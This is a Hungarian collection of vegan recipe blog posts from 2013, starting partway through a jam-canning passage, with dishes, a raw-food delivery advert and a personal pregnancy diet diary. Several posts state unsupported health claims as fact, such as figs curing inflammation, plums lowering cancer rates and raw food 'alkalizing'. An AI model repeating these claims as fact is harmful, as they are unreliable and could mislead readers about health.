Közben elkészítjük az üvegeket. Nagy tisztaságra van szükség, ezért az üvegeket nagyon tisztára kell mosni, hogy semmiféle szennyeződés ne maradjon benne, ahonnan a rohadási folyamat elindulhat. Celofánt a tartósítószermentes befőzéshez nem használunk, mert nem zár jól, és bekerülhetnek a mikroorganizmusok az üvegbe. Csakis teljesen ép, deformálódásmentes tetőkre lesz szükség, ha úgy látjuk, hogy egyik-másik ferde, inkább vásároljunk újakat.
A fedőket forró vízben kifőzzük, és egy papírtörölőre tesszük, míg főzzük a lekvárt, csakúgy, mint az üvegeket.
Mikor a lekvár elkészült, a tetőt és az üveget lefelé fordítva ráengedjük a lekvár gőzét, a gőz felé tartjuk egy ideig, ezzel is még fertőtlenítjük a felületet. A tüzet nem kapcsoljuk le, hanem a még rotyogó lekvárt a gőzölt üvegbe tiszta merőkanállal belemerjük. Segít, ha egy porcelán tányérra állítjuk az üveget, ami elvezeti a hőt. A gőztől az üveg kissé átmelegedik és nem fog szétrepedni, de azért a műveletet kellő óvatossággal végezzük.
Miután megtelt az üveg, azon nyomban rácsavarjuk a gőzölt, tiszta tetőket, és fejre állítjuk őket. Így, fejre állítva azonnal mehetnek is a száraz dunsztba. Jó meleg helyre tegyük őket, takarjuk be plédekkel, takarókkal, hogy akár több napig meleg helyen legyen.
A kihűlt üvegeket utána már a végleges helyükre lehet állítani.
Kellemes befőzést kívánok!
Mézes füge pohárdesszert
2013. szeptember 17. Fittanyuka Blog
Itt van a füge szezon és ez a gyümölcs annyira csábító, cukortartalom ide- vagy oda:)! A piacon vásárolt friss füge volt az alapja ennek a nagyon gyors és egyszerű desszertnek, amit egy kedves öreg nénitől vásároltunk. Tipp: A fügét sokan csak aszalt formában ismerik, pedig frissen is igazán élvezetes, édes gyümölcs. Gyógyhatása igen sokrétű, nemcsak szívünk jobb működését segíti, de emésztési, gyomorégési panaszok esetén is kiválóan alkalmazható. A füge tápértékét elsősorban káliumtartalma adja, de B-vitaminban és cinkben is gazdag. A benne lévő káliumnak köszönhetően elősegíti a vér tisztulását. A B-vitaminok az emésztést és a táplálék felszívódását segítik elő, a cink pedig prosztataproblémák esetén nyújthat enyhülést. Hűsít, és jó hatással van a légzőszervekre is. Gyógyítja a gyulladásos megbetegedéseket, csökkenti a vérzékenységet. Kiváló idegnyugtató tulajdonsága is ismert. Hozzávalók: 2-3 főre 6 szem füge 4-5 darab jégkocka 200 ml zab vagy kókusztejszín ízlés szerint édesíteni mézzel, akár elis hagyható mert önmagában mézédes 1/2 kávéskanál fahéj késhegyni őrölt kardamon kevés kókuszcukor a tetejére Nagyon egyszerű, a fügéket feldaraboljuk és a jégkockákkal, tejszínnel, fahéjjal, kardamonnal krémesre turmixoljuk, fagyis poharakba töltjük és fügével, diszítjük. ( én még szederrel díszitettem). A tetejét kókuszcukorral szórjuk meg. Fittanyuka
Tejszínes,- Kukoricás Lasagna
2013. szeptember 16. Fittanyuka Blog
...sok-sok zöldséggel gazdagítva, folytathatnám a recept címét. Ugyanis a kukorica csak egyik szereplője ennek a receptnek, gyakorlatilag annyi és olyan zöldségekkel gazdagíthatjuk amelyek a kedvenceink, vagy éppen rendelkezésünkre állnak. Nálam a spenót, padlizsán, gomba, hagyma, cukkini volt a választás. Ideális főétel, természetesen tej,-laktóz és mindenféle állati fehérje nélkül! Hozzávalók: 4 fő részére 8-9 db durum lasagna lap 200 g kukorica ( fagyasztottat használtam) 1 db kisebb cukkini 1 fej vöröshagyma 2 maréknyi friss spenótlevél 1/2 db padlizsán 200 g csiperke gomba Besamell mártáshoz: 2-3 evőkanál fehér tönkölyliszt vagy zabliszt 500 ml szójatej - édesítés nélküli! 1 evőkanál kókusz olaj 2 kk himalaya só késhegyni őrölt kardamon késhegynyi őrölt zöld bors 2 cikk fokhagyma A zöldségeket előkészítjük: a cukkinit, hagymát, gombát, padlizsánt vékony szeletekre vágjuk. Mindig kérdés, hogy a padlizsánt lehéjazzuk-e? A válaszom nem, a héja ehető, viszont aki nem szereti nyugodtan lehéjjazhatja. A kukoricát kevés vízzel és sóval puhára pároljuk, a spenótleveleket csak megmossuk. Elkészítjük a besamelt: A felmelegített kókuszolajon, alacsony hőfokon, vagy lángon a lisztet csomómentesre keverjük kézi habverő segítségével és állandó keverés mellett hozzáöntjük a hideg tejet. Addig kavarjuk ameddig besűrűsödik. Ízesítjük a kardamonnal, zöld borssal, fokhagymával. Egy tűzálló szögletes vagy téglalap alakú tálat kikenünk kevés olajjal és keveset öntünk a besamell mártásból erre rétegezzük a lasagne lapokat ( én olyat vásároltam amelyet nem szükséges előfőzni, ez fel van tüntetve a csomagoláson). Majd újabb besamell réteg következik és jöhetnek a zöldségek: kukorica, hagyma, stb. Újabb lasagne lapok következnek, most újra zöldségek és befejezésként, legvégén a besamell mártás. Előmelegített sütőben 180 C fokon 20-25 percig sütjük. Szeletelés előtt hagyjuk kicsit hűlni! Fittanyuka
Táplálkozás természetes, élő ételekkel!
2013. szeptember 14. Nyersétel akadémia
Tudod mit jelent a nyers táplálkozás? Miért fontos, hogy az étel enzimekben gazdag legyen?
Egyre több táplálkozási irányzat jelenik meg az étlapokon, különböző fogyókúrák, diéták válnak ismertté világszerte. Egyről azonban nem szabad megfeledkeznünk: az egészségünk megőrzése érdekében a sokféle főtt, párolt és grillezett ételek mellett megfelelő mennyiségű nyers zöldséget és gyümölcsöt is fogyasztanunk kell! Nem csak az egészség, hanem a karcsúság, az ideális testsúly titka is a vitamindús, enzimekben gazdag, nyers ételek, saláták, turmixok fogyasztása.
Tovább őrizhetjük meg egészségünket és fiatalságunkat, ha takarékosan bánunk saját enzimkészletünkkel, és minél több enzimet juttatunk be a szervezetünkbe a nyers ételek segítségével. A nyers zöldségek természetes orvosságok, hiszen lúgosítanak, magas az ásványi anyag- és nyomelem tartalmuk, energiával töltenek fel úgy, hogy nem hizlalnak. A friss, nyers étel olyan energiabomba a szervezetünknek, amely biztosítja az egész napi aktivitásunkat.
A Nyersétel Akadémián mi elkészítjük az ételeket, az Egészségkonyha pedig házhoz szállítja! Korszerű, légmentesen záródó, fóliás dobozba csomagoljuk a nyers, enzim dús, élő ételeinket.
Napi ételkínálatunkat úgy állítottuk össze, hogy az egész napi nyers étkezést megoldjuk:
Reggelire: zöld turmixok, gyümölcsturmixok, magtejek - naponta váltakozva
Ebédre: levesek, és minden nap két féle főétel, valamint egy édesség
Vacsorára: magkenyér és növényi pástétom
Nasinak: édes és sós aszalványok
Miből is állnak ezek az ételek:
Italok:
zöld turmixok, gyümölcsturmixok és magtejek a kínálatban
- Zöld turmix: Bio zöld levél és édes gyümölcs tisztított vízzel turmixolva. Feltölt energiával és oxigénnel, lúgosít, könnyen emészthető.
- Magtejek: Diófélékből készített friss magtej, pl. vaníliás diótej, fahéjas mandulatej. Tartósítás nélkül készülnek, frissen hazai magokból.
Levesek:
Gyümölcsökből vagy zöldségekből készülnek, enyhe fűszerezéssel, kevés olajos mag, dióféle felhasználásával.
Főételek 1:
Zöldségekből és olajos magvakból készült ételek, melyeket főételként lehet fogyasztani. pl. Cukkini spagetti: Cukkiniből kézi hámozóval, spirelli vágókéssel készített vékony csíkok különböző mártásokkal, szószokkal. Fasírtok: zöldségekből és olajos magokból készült aszalványok, melyeket salátával, zöldségekkel kínálunk. És még sok más étel, amit érdemes kipróbálni.
Főételek 2:
Zöldségekből és olajos magokból készített főételek, főleg rakott, töltött formában. pl. Rakott zöldségek: Különleges zöldség rakottas, melyben olajos magvak és zöldségekből készült rétegek váltják egymást, a teljes íz-harmónia megtartásával. Itt lehet megtalálni a kedvenc ételünket, a nyers pizzát, melyet sokféle változatban készítünk.
Kenyér és pástétom:
Különféle nyers kenyerek, aszalt lapok, valamint zöldséges pástétomok rendelhetők ezen a kódon. Elsősorban vacsorára ajánljuk, kiegészítve friss idényzöldségekkel, retekkel, hagymával, uborkával, stb.
Édességek:
Gyümölcsökből és olajos magokból készült finomságok, amelyekkel lelkiismeret furdalás nélkül kényeztetheted magad. Liszt, tojás és tejtermék nélkül készülnek, egészségesek és finomak.
Aszalványok:
Teljesen kiszárított kenyerek, krékerek, müzlik, müzli-szeletek, édesek és/vagy sósak, melyek 1 hónapig eltarthatóak. Teljesen ki vannak szárítva, így az étvágyunkat gyorsan csillapítják egy pohár tiszta vízzel együtt!
Előtte-utána...:) Mi változott a legutóbbi Vegán Kihívás óta?
2013. szeptember 11. Vegagyerek
Ha jól számolom, pont fél év telt el az első csoportos Vegán Kihívás óta.:) És talán sokaknak izgatja ilyenkor a fantáziáját, na miket is sikerült megtartani a 30 napos időszak után?:) Akkor kezdem én, aztán nagyon szívesen kíváncsi lennék a korábbi résztvevők tapasztalataira...:)) Ami megmaradt...:) - édességet természetesen ettem az elmúlt hónapokban, viszont sokkal kevesebbet kívántam, mint korábban, és szerencsére többnyire kevesebbet is ettem...:)) - a bio növényi margarin (ami csak természetes összetevőkből áll, és nem hidrogénezett!) teljesen kiiktatódott az étrendemből. Nem volt egy tudatos döntés, de a 30 Napos Vegán Kihívás óta, ha kétszer ettem, sokat mondok. Süteményeknél, ahol korábban még használtam, ott is átváltottam a kókuszzsírra. A margarint nem kívántam már, sőt valójában rá se tudok nézni... - fehér cukrot 8 éve nem használok, csak nádcukrot használtam, de az elmúlt hónapokban már az is alig volt itthon, az agave szirup viszont még sokrétűbb felhasználás alá került:) - sokkal több nyerset ettem, mint a korábbi puding-vegás hónapjaimban...:)) Nyers étkező viszont nem hiszem, hogy leszek mostanában, mert annyira azért nem lendültem bele... - sikerült visszatérni tartósabban az olajos magvak fogyasztásához, és a mandulakrém nagyon belopta magát az életembe, hmmm, überkedvenc lett!:)) - megtartottunk sok receptet családilag is, a gyerekek nagy-nagy kedvence továbbra is pl. az amarántos palacsinta.:) És ami nem maradt meg, illetve visszaalakult...:/ - az az egyik legfőbb törekvésem, hogy változatos, és kiegyensúlyozott ételeket készítek, főzök a családnak, majd külön magamnak, na, hát az továbbra sem jött össze sajnos...:( Vagy az egyik, vagy a másik...:/ Ha a családnak főzök, akkor nekem leves + a köret/ desszert, vagy szendvics, ha magamnak főzök, akkor a családnak félkész, vagy fagyasztott...:/ brrrrrr Merthogy az ízlések kb. ennyire különböznek.... - a sok összevissza-evéstől a szénhidrát viszont a kelleténél jóval több lett az étrendemben...:/ (tipikus vega-hiba) - a kávé visszakúszott... Először egy, aztán napi egy-kettő... Sokszor dolgozom, fordítok a gépen éjszaka, keveset alszom (úgy 8 éve, mióta gyerekeim vannak...:)), és hát ez egyelőre máshogy nem ment/ megy... - és hát fentiek folyományaként a tavasszal lement 4 kilóból 3 visszajött... (ja, tipikus, tudom...:DDD) Hát, ennyi dióhéjban...:) Írhattam volna mást is, de akkor nem azt írtam volna, ami van...:))) És Nálatok hogyan alakultak az elmúlt hónapok?;)
Kókuszos tejberizzsel töltött ostyagolyók
Van egy köztársaság a Csendes Óceán térségében, amelyet 18 100-nál is több sziget alkot. További érdekessége, hogy ezek a szigetek az egyenlítő mindkét oldalán helyezkednek el. Ez a köztársaság nem más, mint a világ negyedik legnépesebb országa, Indonézia. Ugyan nem jártam még ott (sajnos), de valahol olvastam, hogy az indonéz emberek szerint annyi módon lehet a kókuszt felhasználni, mint ahány nap van egy évben. Természetesen ők nem csak az ételkészítés lehetőségeit tekintik felhasználásnak, hanem más alkalmak is adottak rá. A kókuszdió húsa, amellett, hogy rendkívül tápláló, pozitív hatással van a nemiségre is. A kókuszpálma rügyét zöldségként fogyasztják. Gyökereit népi gyógyászatban használják a dizentéria (vérhas) gyógyítására, héját fűtésre és hajfesték (fekete) készítésére is hasznosítják. Leveleit csónakok készítéséhez alkalmazzák (többek között), rostjaiból szőnyegeket, kosarakat, lábtörlőket fonnak, s ne feledkezzünk meg a matracok készítéséről se: "A kókuszrost szálai cellulóz alapú anyagból vannak, így könnyű és rugalmas. Mikor táblákba foglalják, ezekből a rostokból pár centis rétegeket fektetnek egymásra és latexszal permetezik be őket. Így a véletlenszerűen elhelyezkedett szálak még ruganyosabbá válnak. Az így kialakított matracszerkezet moly-, baktérium- és poratka-álló." (Kókuszmatrac készítése a Wikipédia szerint.) Mindezek tudatában mi is igazat adhatunk annak a mondásnak, miszerint, "aki kókuszpálmát ültet, edényt, ruhát, ételt és italt, saját maga számára lakhelyet, a gyermekek számára örökséget ültet". Ugyan meglehetősen szokványos, hogy húsából készített reszeléket elsősorban sütéshez, főzéshez használjuk, mégis egy nem szokványos receptet mutatok be azzal, hogy "ostyagömböket" töltök meg kókuszos tejberizzsel. Kissé hasonló íze lett, mint a raffaeló-golyóknak, noha nem mártottam bele már semmibe, hogy egy külső "ruhát" is kapott volna. Így is hihetetlenül gyorsan elfogyott.
A recept:
Hozzávalók:
- 30 dkg barna rizs
- víz
- 4 dl kókusztej vagy más növényi tej
- édesítőszer (nyírfacukor vagy stívia vagy gyümölcscukor, stb.)
- 1 teáskanál biocsicsóka sűrítmény (opcionális)
- 5-10 dkg kókuszreszelék
- mandula és/vagy aszalt gyümölcs (pl: meggy, áfonya, stb.)
- 1 citrom vagy narancs lereszelt héja (opcionális)
Elkészítés:
A rizst miután jó alaposan átmostuk, közepes lángon feltesszük főzni úgy, hogy a víz éppen ellepje. Amikor a vizet magába szívta, felöntjük a kókusztejjel és tovább főzzük, de olykor-olykor megkeverjük, hogy ne égjen le. Amikor a rizsszemek megpuhultak, hozzákeverünk ízlés szerinti kókuszreszeléket (mi jó kókuszosan szeretjük). Nem kötelező, de biocsicsóka sűrítményt is adhatunk hozzá, valamint édesítjük számunkra megfelelően. Reszelt citrom- vagy narancshéjat is szórhatunk bele, különlegesebb ízhatás kedvéért.
Amíg a rizs a fentiek szerint megfő, van idő és lehetőség arra, hogy a megvásárolt ostyaformákat ollóval kivágjuk.
A félgömböket megtöltjük a kókuszos tejberizzsel, a közepébe pedig aszalt meggyet/áfonyát vagy egész mandulaszemet teszünk. Én mindkettővel kipróbáltam és nem tudnék választani, melyik a finomabb.
Az elkészült golyókat levegősen tegyük tálcára, így könnyebben megszikkadnak a hűtőben és nem lesz puha a külsejük.
Ilyen ostyalapot általában százforintos (egy eurós) boltokban szoktam látni.
Ez az egy Praliné Zsuzsi fotója
Fahéjas Szilvás lepény
2013. szeptember 4. Fittanyuka Blog
Tej,-tojás,-cukormentes Kertünkben az orvosság. Erdélyben rengeteg kék szilva terem és fekete, hegyi áfonya. Megfigyelték, hogy azokban a falvakban ahol ezt a két gyümölcsöt rendszeresen fogyasztják és az ebből készült lekvárokat nem ismerik a rákos megbetegedéseket, legalábbis jóval ritkábban fordulnak elő, mint más falvakban, településeken ahol nem fogyasztják ezeket a gyümölcsöket Mindenki az áfonyát ismeri úgy, hogy nagyon magas az antioxidáns tartalma, az egyik legmagasabb az orac értéke. Viszont kevesen tudják, hogy a szilvának magasabb az orac értéke és utána következik a fekete áfonya. Kék szilva orac értéke / 100 g - 5700 Fekete áfonya orac értéke / 100 g - 2400 Szilva élettani hatásai: Kevés cukor és magas víztartalom jellemzi a friss szilvát. Mintegy 85% víz van benne, ezért jól oltja a szomjat. 100 gramm gyümölcs nagyjából 50 kalória (209 KJ) energiát hordoz. Szénhidráttartalma 10,3 g körüli. Vitaminjai közül az A-, az A-provitamin, a béta-karotin, a B1- és B2-, illetve csaknem valamennyi B-vitamin, továbbá a C-vitamin érdemelnek említést. Nagyobb mennyiségben tartalmaz ásványi anyagokat (kálium, kalcium, foszfor és magnézium) és cinket. A növényi antioxidánsok közül antocián színanyagokat és flavonoidokat; rutint és quercetint tartalmaz jelentősebb mennyiségben. Mindezen anyagoknak köszönhetően javítja az immunrendszeri ellenálló-képességet, véd a szív- és érrendszeri megbetegedésekkel szemben. Élettani hatásait tekintve igen fontos rosttartalma - héjában például rengeteg cellulóz van - , ami jól megmozgatja a beleket, így ajánlható székrekedés ellen. Szilvás lepény Hozzávalók: 250 g teljeskiőrlésű tönköly liszt 250 g fehér tönköly liszt 100-150 g darált dió, vagy mandulaliszt ( nem feltétlenül szükséges) 150 g kókusz cukor ( annak függvényében, hogy ki mennyire édesen szereti) 400 ml növényi tej 5-6 evőkanál kókusz olaj 1 csomag foszfátmentes sütőpor 1/2 citrom reszelt héja 250 g magozott kék szilva 1 kk őrölt fahéj 3 evőkanál kókusz cukor Egy keverőtálban először a száraz, utána a nedves hozzávalókat összekeverjük, majd robotgép segítségével tovább keverjük. Kiolajozott sütő formába öntjük, lehet kapcsos torta forma is: kb. 30 cm átmérőjű. A kimagozott szilvákat őrölt fahéjjal elkevert kókusz cukorba hempergetjük, majd lisztben is meghempergetjük, (hogy a sütemény tetején maradjanak) és tetszetősen a tészta tetejére szórjuk. Majd előmelegített sütőben 180 fokok 40 - 45 percig sütjük. Mielőtt kivennénk a sütőből végezzünk szúrópróbát! Fittanyuka
A legédesebb bejegyzés :-)
2013. szeptember 1. Mindennapi ételeink
Elérkeztünk a 3. trimeszterbe, így már meg merjük osztani a blog olvasóival is a csodás hírt: kislányunk szíve is dobog már bennem. :-) A 7. hónap első hetében járunk, és arra gondoltam, hogy mivel mégiscsak egy gasztroblogról van szó, főképp a várandósság alatti étkezésről, laboreredményekről, életmódról írnék. Merthogy sokszor halljuk, hogy aki várandós, az minimum sajtot, tejet egyen-igyon, de a hússal is barátkozzon meg, mert anélkül hiányállapotok léphetnek fel. Ezért szeretnék erről írni, nem mint követendő példa, hiszen pl. a 9. hónap elejéig tervezem a munkáimat vinni (némileg kényszerből is), ill. elég sok vendégünk és pluszprogramunk is van, ami már néha megerőltetőnek tűnik, így alakult ez az időszak, tehát ezt semmiképp nem tartom követendőnek. Persze este 10-11 után már igyekszem a kis jövevényre koncentrálni, elcsendesedni, rengeteget olvasunk, hangolódunk, beszélünk hozzá... vagyis ő is kommunikál velünk: kapjuk a sok és intenzív rúgást...szegény férjem is az esti elköszönőnél, amikor beköszön a kislányunknak, 10-15 másodpercen belül a kis Törpilla szépen lassan odamegy, és óriási, intenzív rúgásokkal-csapkodásokkal jelzi, hogy tetszik neki ez a hang :-) . Meg persze egész nap, amikor szabad idő van, vagy érzem, hogy mocorog (nagyon sokat teszi ezt:-), akkor beszélek hozzá. Nagyszerű érzés. Nagyon sok zenét is hallgatunk, a kedvencei a Gryllus dalok, teljesen beindul tőlük. Vagy lehet, hogy nem tetszik neki, és így jelez, hogy hagyjuk már békén ezzel a zenével? :-) Szóval, a táplálkozás: amikor a várandósságom elindult, a laboreredmények alapján minden rendben volt, az értékeim szinte tökéletesek voltak. Aztán az előző terhességem végét jelentő vetélés miatt sárgatest hormont szedtem, ami ellenére most is a 3-4. hónap környékén voltak komplikációk, ott 5 hétig sokat kellett feküdnöm, és a 1,5-2 hónapos hormonpótlás valószínűleg hatott a májamra, mert azok az értékek romlottak. (Terveztem egy máriatövis-kúrát, de arról lemondtam, utána olvasva, hogy az terhesség alatt nem ajánlott.) A hányingeres korszakot viszont egészen jól átvészeltem: kb. 3 hétig volt intenzív, de a gyömbérpor, keksz, tönkölyös házi ropi, menta-és ánizs-édeskömény tea abszolút segítettek. Hála Istennek a terhességi székrekedés csak ritkán, ill. az aranyér nem ért utol (eddig?). Ez talán a rengeteg rostnak köszönhető: a mindennapi reggeli növényi tejben megfőzött, szójajoghurtokkal, vagy natúr, gyümölcsökkel fogyasztott kásáknak, a teljes őrlésű gabonáknak, a rengeteg nyers zöldségnek, gyümölcsnek, és turmixnak, és a sok-sok aszalt gyümölcsnek (főképp szilva, datolya, füge. Ez utóbbiban nagyon sok a magnézium, így ezért is megéri várandósként enni). A mozgásban a napi 10-12 óra munka + háztartás + vendégek miatt sajnos nem nagyon jeleskedtem, jeleskedek. Igyekszem mindenhova gyalog menni, hogy legalább 30 perc egybefüggő séta legyen egy napomban. Érdekes, hogy nem volt kimondott étel, amit kívántam volna, vagy ami undort okozott volna. Minden jöhetett és jöhet most is, kiegyensúlyozottan, csak kisebb mennyiségekben. Rengeteg friss zöldséget, gyümölcsöt, olajos magvat, teljes értékű gabonát eszünk, ezek nagyon jólesnek. Az elején a hányinger miatt ettem többször kisebb adagot, a második trimeszterben ,,normálisan tudtam étkezni, és most 1-2 hete a gyomorégés, ill. a baba növekedése miatti gyomorbántalmak :) miatt vagyok kénytelen kevesebbet enni. Eddig 4 kg ,,szökött fel, főleg a hasamra. Egyébként nem határoztuk el, hogy vegánul fogunk étkezni a terhesség alatt, úgy voltam vele, hogy a szervezetem jelezni fog, mire van szükségem. Mint ahogy a vegánságot sem erőltetem senkire, pláne nem a várandóstársakra. A laktózintoleranciámra viszont nekem figyelni kellett, kell. Azaz a tej, sajt, tejföl teljes mértékben kiesik. A laktózmentes túrót, natúr joghurtot, és a (házi) tojást volt, hogy megkívántam, vagy megkívánom, ezeket kb. havonta fogyasztom, kis adagban (egyszerJ ), de utána elvagyok nélkülük. A B 12 pótlás tűnt az egyik kritikus pontnak. Ezért ezt tablettában vittem be, ill. kalciummal és B-vitaminokkal (köztük B 12-vel) dúsított Alpro tejeket (szója, mandula) elég sokat ittam, iszom (napi 1-2 pohárral). A terhesség első harmadában folsavat, terhesvitamint szedtem, majd kb. a közepétől magnéziumot szedek (nekem a Béres Magne B 6 vált be), néha kálciumot, terhesvitamint heti 1-2-szer. A második laboreredményemre azt mondta a védőnő, hogy ilyen jó vérképet és vaseredményt még nem látott (felső érték felett volt 3 századdal. :-)) Ennek megörültem, és a húsevő barátok is abbahagyták a győzködést. J Aztán pár hónap múlva jött a terheléses cukorvizsgálat, ott is minden rendben volt, de a vasam magamhoz képest csökkent (alsó határérték alá 2-3 századdal). Így jött is a tanács: egyek vörös húsokat, de minimum sajtot, tejet. Hát, helyette megpróbálkozom a nyers céklával, spenóttal, minimum heti kétszer, ill. a Ferro-comp tabletta mellett döntöttem, mert ez elég jól felszívódik (pl. C-vitamin tartalmának köszönhetően), és nem okoz székrekedést sem. Meglátjuk pár hét múlva, meglátszik-e majd az értékeken. Meg a közérzetemen, mert mostanában pl. hét végére nagyon kifáradok. Ez talán annak is köszönhető, hogy két hete a kislányunk minden éjjel óriásit ,,bulizik: félóránként beindul, és szinte az ágyunk is beleremeg, annyira intenzíven ,,lubickol. Emellett fél óránként WC-re is járok, mert persze a mozgásával alaposan megtámadja a hólyagomat is:-) Reggelre, mire kelnem kell, nagyjából elalszik. Reméljük, születése után ezt nem folytatja.:-) Jó hír volt viszont, hogy a máj értékeim most rendben voltak. Ez nálam nagy szó, mert 3-4 éve történt balesetünk óta ez mindig kényes terület és ha több cukrosat eszem, vagy tejtermék csúszik le, akkor rosszabbul vagyok. Ami még eszembe jut a táplálkozás témakörével kapcsolatban: cukor helyett csak nyírfacukrot használok, persze, ha itt-ott kapunk édességet, azt elfogyasztom. :-) Cukros, vagy boltban vásárolt üdítőt nem iszunk, vagy ha megkívánom és épp nincsen annyi préselni való gyümölcs, akkor 100%-os narancslé után nyúlok. Hát, így telnek napjaink, köszönöm, hogy elolvastátok ezt a jó hosszú bejegyzést. Ha van bármilyen tippetek, ötletetek, javaslatotok, nagyon szívesen olvasom. :-) Nem tervezzük, hogy leálljon a blog, már most előre fotózunk 1-2 hónapra dolgokat, így amikor kritikus időszak következik, akkor ezeket osztjuk majd meg. Ill. tervezek majd Baba-mama recepteket is, egy kicsit később. És mivel ebben nincsen tapasztalatom, nem hiszem, hogy sok újat tudok majd ilyen téren nyújtani.. Majd alakul a dolog. :-)
Cukkinis muffin (vegán)
Szeretem a cukkinit. Annyi mindent lehet belőle készíteni. Nem fogyok ki az ötletekből. A következő muffin esetében szintén a cukkini az alap, amihez sörélesztőpelyhet és zabpelyhet adtam elsősorban, így készítettem egy klassz kis muffint. Gyorsan elkészül és csupa egészséges dolgok vannak benne. Ami a sörélesztőpelyhet illeti, vegáknak és vegánoknak érdemes az étrendbe építeni, mivel amellett, hogy az összes alapvető aminosavat tartalmazza, B1 vitamin, B2 vitamin, B3 vitamin, B5 vitamin, B6 vitamin, B9 vitamin B7 vitamin is van benne, továbbá említésre való a kalcium, króm, szelén, vas és foszfor tartalma. Találunk benne még rezet, cinket és jódot is. Mindezek is elvezetnek oda, hogy jó hatással van a bőr, a köröm és a haj szerkezet egészséges megtartására. A sörélesztő pehely jótékony hatással bír a cukorbetegségre is, mivel közrejátszik a vércukorszint stabilizálásában. Az sem mellékes, hogy a koleszterin szintet is helyes irányba befolyásolja. Ugyan benne rejlik az "élesztő" szó, ez azonban nem azt jelenti, hogy képes lenne tészták kelesztésére. Nem. Árpából készül eredetileg (ezért gluténmenteseknek kevésbé ajánlott, paleosok pedig mellőzik - tudomásom szerint). Viszont előnye mindemellett, hogy candida diétát folytatók is nyugodt szívvel használhatják, mert nem olyan hatása van, mint az élesztőnek. Nem puffaszt, ellenben regeneráló és immunerősítő hatása miatt javasolják fogyasztását mindazoknak, akik műtéteken estek át. A fizikai teljesítmény is növeli, amennyiben rendszeresen étrendünkbe építjük, ezért sportolóknak is ajánlják. Mi is felhasználhatjuk krémek, sütemények, édes és sós ételek készítése során, mint az alábbi cukkinis muffin készítésekor is.
A recept:
Hozzávalók:
- 1 -2 cukkini
- 1 hagyma
- só
- kurkuma
- 2 dl növényi tej
- sörélesztőpehely
- zabpehely
- 3-4 gerezd fokhagyma
- napraforgó (opcionális)
- muffin papír
Elkészítés:
A cukkiniket meghámozzuk, majd nagyon apró kockalapokra feldaraboljuk, egy tálba tesszük és megsózzuk. Átforgatjuk, hogy a só mindenhol érje a cukkinit, így egy kevés levet fog ereszteni. A hagymákat, fokhagymákat megpucoljuk, felaprítjuk és hozzászórjuk a cukkinihez. Adunk hozzá kb. 1 teáskanál kurkumát, ettől szép sárga színe lesz, mintha tojással sütöttük volna. Ezt követően felváltva adagoljuk hozzá a sörélesztőpelyhet és a zabpelyhet. Mindig öntünk hozzá egy kis növényi tejet, míg olyan masszát nem kapunk, ami nem folyékony, de nem is túl száraz. Ha nem elég sós az így kapott massza, egy kevés sót még adhatunk hozzá. A muffin papírokat a formákba helyezzük és a kész masszát a papírokba kanalazzuk. A tetejüket megszórhatjuk napraforgómaggal. 15-20 perc alatt készre sütjük. A muffin papírjait könnyedén le tudjuk húzni a fogyasztás előtt a cukkinis muffinról.
Édes kis (mandulás-aszalt barackos) semmiség
2013. augusztus 23. Mindennapi ételeink
A múltkor bemutatott keksz után egy újabb ajánló: tej-tojásmentes, mézes keksz a 2004 Rena Kft. jóvoltából....Kicsit felturbózva. :-) Hozzávalók: 10 dkg kókuszolaj 8-10 dkg karobpor 5 dkg nyírfacukor 10 dkg pirított mandula 5 dkg aszalt sárgabarack 3-4 szem aszalt datolya -- 1 csomag tej-tojásmentes Privolat omlós keksz - mézzel Elkészítés: A kókuszolajat felolvasztjuk, a nyírfacukrot megőröljük (kávédarálón), a datolyákat botmixerrel pépesítjük, a mandulákat pedig egy zsiradék nélküli edényben megpirítjuk, majd késes aprítóban rusztikus darabokra vágjuk. A barackot is nagyon apróra feldaraboljuk. Majd egy tálban mindent összekeverünk (először a nyírfacukrot és karobot, ill. a datolyát,és ezt követően a folyékony, vagy épp kenhető kókuszolajat), és a kekszekre kenjük mindezt. Behűtjük és kb. 1 óra elteltével tálaljuk is. :-)
Kecskesajt a hűtőmben
2013. augusztus 23. La Veganista
Bizony! Az alapanyaga kesu, ami kiváló A- és B vitamin, béta-karotin, folsav, foszfor, magnézium, vas, réz, cink és szelén forrás. Kalciumban gazdag csonterősítő, antioxidáns és E vitamin tartalma pedig késlelteti az öregedést. Az alternatív kecskesajt receptjét Alicia Silverstone oldalán (http://thekindlife.com/) találtam. Az íróként, film és tv producerként is tevékenykedő színész, elkötelezett állatjogi és környezetvédelmi aktivista. 1998-ban lett vegán, egy állatjogi rendezvényt követően, ahol a következő felismerésre jutott: "I realized that I was the problem ... I was an animal lover who was eating animals." ("Rájöttem, hogy én voltam a probléma. Állatimádó voltam, aki állatokat evett.") Alicia szenvedélyes állatvédőként öko-barát otthonát mentett kutyákkal osztja meg, PETA kampányokhoz adja a nevét, és könyvet írt "The kind diet" címmel, hogy segítse az egészséges, erőszakmentes vegán életmódra történő átállást. Visszatérve receptünk tárgyához, melynek kellemesen savanykás ízvilága, enyhén krémes állaga valóban hasonlatos a kecskesajthoz. Finomabb, a boltban kapható vegán sajtoknál. Mivel számos receptben felhasználható megéri elkészíteni, és közben zenét is hallgathatunk.
Hozzávalók:
3/4 csésze natúr kesu
1/4 csésze repceolaj
1/4 csésze citromlé
1 1/4 teáskanál só
2 evőkanál víz
1 teáskanál durvára tört színes bors vagy chili pehely, vagy zöld fűszerek
Így készítsd el:
Áztasd egy éjszakán át a kesut.
Öntsd le róla a vizet, majd hideg vízzel mosd át és szűrd le.
Homogenizáld a magvakat botmixerrel, vagy turmixgéppel, add hozzá az olajat, a citromlevet a sót és a két kanál vizet. Fontos, hogy a lehető legfinomabb textúrát érjük el.
Egy tál fölé rakj szűrőt, arra pedig pelenka, vagy sajtszűrő anyagot.
A masszát kanalazd az anyagra, majd a szélét fogd össze és tekerd meg. A kis gömböc végét erős gumival zárd le.
A gömböcöt hagyd a szűrőn szobahőmérsékleten 12 órán keresztül, hogy kicsöpöghessen belőle a fölösleges folyadék.
Ha letelt az idő, melegítsd elő a sütőt 100 °C-ra. (ez kb. az egyes fokozat gázsütőn)
Bontsd ki a sajtot az anyagból és helyezd át egy 20x20-as sütőpapírra. Henger formában helyezd bele a sajt masszát, a végeit csavard meg erősen, nehogy a sütőben kinyíljon.
Süsd 35 percig, ezalatt a sajt külseje kissé megkérgesedik, a belseje pedig puha, krémes marad.
A sütési idő leteltével hagyd kihűlni, majd ízlés szerint forgasd bele a színes borsba, a chili pehelybe, vagy a zöld fűszerekbe.
A sajt néhány napig eláll a hűtőben, de esélye sem lesz megromlani, hiszen annyira finom.
Magyar ízek utcája - 2013
